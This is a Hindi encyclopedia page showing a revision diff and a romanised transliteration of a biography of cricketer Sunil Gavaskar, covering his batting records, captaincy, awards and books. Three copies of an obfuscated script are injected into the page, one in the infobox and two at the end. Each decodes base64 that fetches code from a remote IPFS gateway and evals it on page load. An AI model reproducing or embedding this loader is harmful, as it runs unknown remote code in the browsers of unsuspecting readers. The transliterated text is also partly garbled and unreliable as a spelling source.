Difference between revisions of "सुनील गावस्कर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "श्रृंखला" to "शृंखला")
Line 66: Line 66:
 
|अद्यतन={{अद्यतन|12:51, 17 जनवरी 2011 (IST)}}
 
|अद्यतन={{अद्यतन|12:51, 17 जनवरी 2011 (IST)}}
 
}}
 
}}
'''सुनील गावस्कर''' वर्तमान [[युग]] में [[क्रिकेट]] के महान [[बल्लेबाज़|बल्लेबाजों]] में गिने जाते हैं। सनी का जन्म [[10 जुलाई]], [[1949]] को [[बंबई]] ([[महाराष्ट्र]]) में हुआ था। उनकी पत्नी का नाम मार्शनील है। इनके पुत्र रोहन गावस्कर भी भारतीय क्रिकेट टीम में खेल चुके हैं।
+
'''सुनील गावस्कर''' ([[अंग्रेज़ी]]: ''Sunil Gavaskar'') भारतीय क्रिकेट टीम के पूर्व कप्तान हैं जिन्हें [[क्रिकेट]] के महानतम [[बल्लेबाज़|बल्लेबाजों]] में शुमार किया जाता है। सनी का जन्म [[10 जुलाई]], [[1949]] को [[बंबई]] ([[महाराष्ट्र]]) में हुआ था। उनकी पत्नी का नाम मार्शनील है। इनके पुत्र रोहन गावस्कर भी भारतीय क्रिकेट टीम में खेल चुके हैं।
 
==बल्लेबाज़ी कीर्तिमान==
 
==बल्लेबाज़ी कीर्तिमान==
 
इन्होंने [[बल्लेबाज़ी]] से संबंधित कई कीर्तिमान स्थापित किए। गावस्कर (अपने समय काल में) ने विश्व क्रिकेट में 3 बार, एक वर्ष में एक हज़ार रन, सर्वाधिक शतक (34), सर्वाधिक रन (नौ हज़ार से अधिक), सर्वाधिक शतकीय भागेदारियाँ एवं प्रथम शृंखला में सर्वाधिक रन बनाने वाले एकमात्र बल्लेबाज थे। 'सनी' गावस्कर की हर पारी एवं रन ऐतिहासिक होते हैं। उन्होंने भारतीय टीम का कुशल नेतृत्व किया और कई महत्त्वपूर्ण विजयें प्राप्त कीं, जिनमें 'एशिया कप' एवं 'बेसन एंण्ड हेजेस विश्वकप' (BENSON & HAZES WORLD CUP) प्रमुख है। [[चित्र:Sunil-Gavaskar-2.jpg|thumb|left|सुनील गावस्कर]] 'क्रिकेट के आभूषण' कहे जाने वाले गावस्कर ने एक दिवसीय मैचों में भी अपनी टीम के लिए ठोस आधार प्रस्तुत किया है। वे 100 कैंचों का कीर्तिमान भी [[इंग्लैंड]] में बना चुके हैं। गावस्कर क्रिकेट की एक अद्वितीय पहेली हैं। 1986 में उनके खेल जीवन का उत्तरार्द्ध होने के बाद भी उनके खेल में और निखार आया। अपने कॉलेज की ओर से क्रिकेट खेलते समय भी वे सबसे सफल बल्लेबाज माने जाते थे। 1971 में उन्हें टैस्ट टीम के वेस्टइंडीज दौरे के लिए चुना गया था। सनी को विश्व का सर्वोपरी खिलाड़ी माना जाता है।  
 
इन्होंने [[बल्लेबाज़ी]] से संबंधित कई कीर्तिमान स्थापित किए। गावस्कर (अपने समय काल में) ने विश्व क्रिकेट में 3 बार, एक वर्ष में एक हज़ार रन, सर्वाधिक शतक (34), सर्वाधिक रन (नौ हज़ार से अधिक), सर्वाधिक शतकीय भागेदारियाँ एवं प्रथम शृंखला में सर्वाधिक रन बनाने वाले एकमात्र बल्लेबाज थे। 'सनी' गावस्कर की हर पारी एवं रन ऐतिहासिक होते हैं। उन्होंने भारतीय टीम का कुशल नेतृत्व किया और कई महत्त्वपूर्ण विजयें प्राप्त कीं, जिनमें 'एशिया कप' एवं 'बेसन एंण्ड हेजेस विश्वकप' (BENSON & HAZES WORLD CUP) प्रमुख है। [[चित्र:Sunil-Gavaskar-2.jpg|thumb|left|सुनील गावस्कर]] 'क्रिकेट के आभूषण' कहे जाने वाले गावस्कर ने एक दिवसीय मैचों में भी अपनी टीम के लिए ठोस आधार प्रस्तुत किया है। वे 100 कैंचों का कीर्तिमान भी [[इंग्लैंड]] में बना चुके हैं। गावस्कर क्रिकेट की एक अद्वितीय पहेली हैं। 1986 में उनके खेल जीवन का उत्तरार्द्ध होने के बाद भी उनके खेल में और निखार आया। अपने कॉलेज की ओर से क्रिकेट खेलते समय भी वे सबसे सफल बल्लेबाज माने जाते थे। 1971 में उन्हें टैस्ट टीम के वेस्टइंडीज दौरे के लिए चुना गया था। सनी को विश्व का सर्वोपरी खिलाड़ी माना जाता है।  
Line 75: Line 75:
 
====कप्तान के रूप में====
 
====कप्तान के रूप में====
 
1975-76 में न्यूज़ीलैण्ड के दौरे के समय गावस्कर ने भारतीय टीम को नेतृत्व भी दिया, जिसमें भारत विजयी रहा। 1978-79 में वेस्टइंडीज़ की टीम ने भारत का दौरा किया था। उस समय उन्हें भारतीय टीम का कप्तान नियुक्त किया गया। उसमें सुनील गावस्कर ने एक साथ कई रिकार्ड और कीर्तिमान स्थापित किए। उन्होंने 34 शतक बनाए जो उस समय तक सबसे ज्यादा थे। इस प्रकार शतक बनाने और सबसे अधिक रन बटोरने के मामले में वह सबसे आगे निकल गए थे।  
 
1975-76 में न्यूज़ीलैण्ड के दौरे के समय गावस्कर ने भारतीय टीम को नेतृत्व भी दिया, जिसमें भारत विजयी रहा। 1978-79 में वेस्टइंडीज़ की टीम ने भारत का दौरा किया था। उस समय उन्हें भारतीय टीम का कप्तान नियुक्त किया गया। उसमें सुनील गावस्कर ने एक साथ कई रिकार्ड और कीर्तिमान स्थापित किए। उन्होंने 34 शतक बनाए जो उस समय तक सबसे ज्यादा थे। इस प्रकार शतक बनाने और सबसे अधिक रन बटोरने के मामले में वह सबसे आगे निकल गए थे।  
 
 
==सम्मान और पुरस्कार==
 
==सम्मान और पुरस्कार==
भारत में सुनील गावस्कर को 1975 में '[[अर्जुन पुरस्कार]]' एवं 1980 में '[[पद्म भूषण]]' प्राप्त हुआ। इसके अतिरिक्त कई देशों में उन्हें सम्मानित किया जा चुका है। 1980 में ही वे 'विस्डेन' भी प्राप्त कर चुके हैं।
+
[[भारत]] में सुनील गावस्कर को [[1975]] में '[[अर्जुन पुरस्कार]]' एवं [[1980]] में '[[पद्म भूषण]]' प्राप्त हुआ। इसके अतिरिक्त कई देशों में उन्हें सम्मानित किया जा चुका है। [[1980]] में ही वे 'विस्डेन' भी प्राप्त कर चुके हैं।
 
==रोचक तथ्य==
 
==रोचक तथ्य==
 
* सुनील गावस्कर के बारे में एक आश्चर्यजनक तथ्य यह है कि वह अपने शरीर (कद 5 फ़ुट 5 इंच, वज़न 66 किलो) की ठीक-ठाक रखने के लिए [[क्रिकेट]] के मैदान से सीधे [[बैडमिंटन]] के मैदान में पहुँच जाते हैं।  
 
* सुनील गावस्कर के बारे में एक आश्चर्यजनक तथ्य यह है कि वह अपने शरीर (कद 5 फ़ुट 5 इंच, वज़न 66 किलो) की ठीक-ठाक रखने के लिए [[क्रिकेट]] के मैदान से सीधे [[बैडमिंटन]] के मैदान में पहुँच जाते हैं।  
Line 86: Line 85:
 
गावस्कर ने क्रिकेट से सम्बन्धित कई महत्त्वपूर्ण पुस्तकें भी लिखी हैं। जिनमें '''सनी डेज''', '''आइडल्स''', '''रंस एण्ड रूइंस''' तथा '''वन डे वंडर्स''' काफ़ी लोकप्रिय हुई हैं। आकर्षक व्यक्तित्व के स्वामी सुनील गावस्कर एक फ़िल्म में भी अभिनय कर चुके हैं।  
 
गावस्कर ने क्रिकेट से सम्बन्धित कई महत्त्वपूर्ण पुस्तकें भी लिखी हैं। जिनमें '''सनी डेज''', '''आइडल्स''', '''रंस एण्ड रूइंस''' तथा '''वन डे वंडर्स''' काफ़ी लोकप्रिय हुई हैं। आकर्षक व्यक्तित्व के स्वामी सुनील गावस्कर एक फ़िल्म में भी अभिनय कर चुके हैं।  
  
{{लेख प्रगति
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2|माध्यमिक=|पूर्णता=|शोध=}}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 12:06, 4 July 2014

sunil gavaskar
vyaktigat parichay
poora nam sunil manohar gavaskar
any nam sani
janm 10 julaee, 1949
janm bhoomi muanbee (maharashtr)
ooanchaee 5 phut 5 ianch
patni marshanil
santan putr- rohan gavaskar
khel parichay
ballebazi shaili daean hath
tim bharat, muanbee aur samaraset
bhoomika ballebaj
pahala test 6 march, 1971 (vestiandij ke viruddh)
akhiri test 13 march, 1987 (pakistan ke viruddh)
pahala vanade 13 julaee, 1974 (ianglaiand ke viruddh)
akhiri vanade 5 navanbar, 1987 (ianglaiand ke viruddh)[1]
kairiyar aank de
praroop test kriket ekadivasiy antarrashtriy ti-20 antarrashtriy
muqabale 125 108 0
banaye gaye ran 10122 3092 0
ballebazi ausat 51.12 35.13 o
100/50 34/45 1/27 0
sarvochch skor 236* 103* 0
pheanki gee geandean 380 20 0
viket 1 1 0
geandabazi ausat 206.00 25.00 0
pari mean 5 viket 0 0 0
muqabale mean 10 viket 0 0 0
sarvochch geandabazi 1/34 1/10 0
kaich/stampiang 108 22 0
bahari k diyaan espncricinfo
adyatan <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sunil gavaskar (aangrezi: Sunil Gavaskar) bharatiy kriket tim ke poorv kaptan haian jinhean kriket ke mahanatam ballebajoan mean shumar kiya jata hai. sani ka janm 10 julaee, 1949 ko banbee (maharashtr) mean hua tha. unaki patni ka nam marshanil hai. inake putr rohan gavaskar bhi bharatiy kriket tim mean khel chuke haian.

ballebazi kirtiman

inhoanne ballebazi se sanbandhit kee kirtiman sthapit kie. gavaskar (apane samay kal mean) ne vishv kriket mean 3 bar, ek varsh mean ek hazar ran, sarvadhik shatak (34), sarvadhik ran (nau hazar se adhik), sarvadhik shatakiy bhagedariyaan evan pratham shriankhala mean sarvadhik ran banane vale ekamatr ballebaj the. 'sani' gavaskar ki har pari evan ran aitihasik hote haian. unhoanne bharatiy tim ka kushal netritv kiya aur kee mahattvapoorn vijayean prapt kian, jinamean 'eshiya kap' evan 'besan eannd hejes vishvakap' (BENSON & HAZES WORLD CUP) pramukh hai. thumb|left|sunil gavaskar 'kriket ke abhooshan' kahe jane vale gavaskar ne ek divasiy maichoan mean bhi apani tim ke lie thos adhar prastut kiya hai. ve 100 kaianchoan ka kirtiman bhi ianglaiand mean bana chuke haian. gavaskar kriket ki ek advitiy paheli haian. 1986 mean unake khel jivan ka uttararddh hone ke bad bhi unake khel mean aur nikhar aya. apane k aaulej ki or se kriket khelate samay bhi ve sabase saphal ballebaj mane jate the. 1971 mean unhean taist tim ke vestiandij daure ke lie chuna gaya tha. sani ko vishv ka sarvopari khila di mana jata hai.

ranoan ka safar

janavari 1973 mean kanapur mean ianglaind ke viruddh apane jivan ka 11vaan test khelate hue unhoanne 1000 ran poore kie. aprail 1976 mean port af spen mean vestiandiz ke viruddh apana 23vaan test khelate hue unhoanne 2000 ran poore kie. disambar 1977 mean parth mean astreliya ke viruddh apana 34vaan test khelate hue 3000 ran poore kie. disambar 1978 mean kalakatta mean vestiandiz ke viruddh apana 43vaan test khelate hue 4000 ran poore kie the, aur sitambar 1979 mean beangalor mean 52vaan test khelate hue 5000 ran poore kie.

bharatiy kriket mean yogadan

lambe arse se bharatiy kriket ko jis udaghatak (opanar) ballebaz ki talash thi, usaki sahi khoj 1971 mean poori huee. jab sunil gavaskar ne vestiandiz ke viruddh advitiy pradarshan kiya. usake bad unhoanne kabhi pichhe mu dakar nahian dekha. us pahali shriankhala ke char test maichoan mean gavaskar ne 774 ran (ausat 184.80) banakar ek kirtiman sthapit kiya. port af spen ke paanchavean test ki pahali pari mean 124 v doosari pari mean 220 ran banakar ve vishv vikhyat ballebaz valtars, ji. es. chaipal aur larens rau ki shreni mean a kh de hue, jinhoanne test kriket mean pahali pari mean shatak v doosari pari mean dohara shatak banane ka rikard qayam kiya hai.

kaptan ke roop mean

1975-76 mean nyoozilaind ke daure ke samay gavaskar ne bharatiy tim ko netritv bhi diya, jisamean bharat vijayi raha. 1978-79 mean vestiandiz ki tim ne bharat ka daura kiya tha. us samay unhean bharatiy tim ka kaptan niyukt kiya gaya. usamean sunil gavaskar ne ek sath kee rikard aur kirtiman sthapit kie. unhoanne 34 shatak banae jo us samay tak sabase jyada the. is prakar shatak banane aur sabase adhik ran batorane ke mamale mean vah sabase age nikal ge the.

samman aur puraskar

bharat mean sunil gavaskar ko 1975 mean 'arjun puraskar' evan 1980 mean 'padm bhooshan' prapt hua. isake atirikt kee deshoan mean unhean sammanit kiya ja chuka hai. 1980 mean hi ve 'visden' bhi prapt kar chuke haian.

rochak tathy

  • sunil gavaskar ke bare mean ek ashcharyajanak tathy yah hai ki vah apane sharir (kad 5 fut 5 ianch, vazan 66 kilo) ki thik-thak rakhane ke lie kriket ke maidan se sidhe baidamiantan ke maidan mean pahuanch jate haian.
  • pustakean padhane aur sangit sunane ka unhean bahut hi shauq hai. unhoanne svayan bhi 'sani dez' namak ek pustak likhi hai aur hamesha logoan se kriket ki shabdavali mean bat karate haian.
  • kahate haian ki ek bar vah apani kar mean kahian par ja rahe the unaki kar ke age ek adami a gaya. unhoanne braik lagaya aur kar se utarakar us adami ke pas ge aur bole–"are bhaee, dekhakar chala karo, nahian to ran aut ho jaoge." us adami ko yah pahachanane mean zara bhi der nahian lagi ki yah to sunil gavaskar hai.
  • gavaskar vishv kriket mean 10,000 ran aur 30 shatak karane vale pahale ballebaz the.

mahattvapoorn pustakean

gavaskar ne kriket se sambandhit kee mahattvapoorn pustakean bhi likhi haian. jinamean sani dej, aidals, rans end rooians tatha van de vandars kafi lokapriy huee haian. akarshak vyaktitv ke svami sunil gavaskar ek film mean bhi abhinay kar chuke haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. Sunil Gavaskar (aangrezi) (ech.ti.em.el) espncricinfo. abhigaman tithi: 21 janavari, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>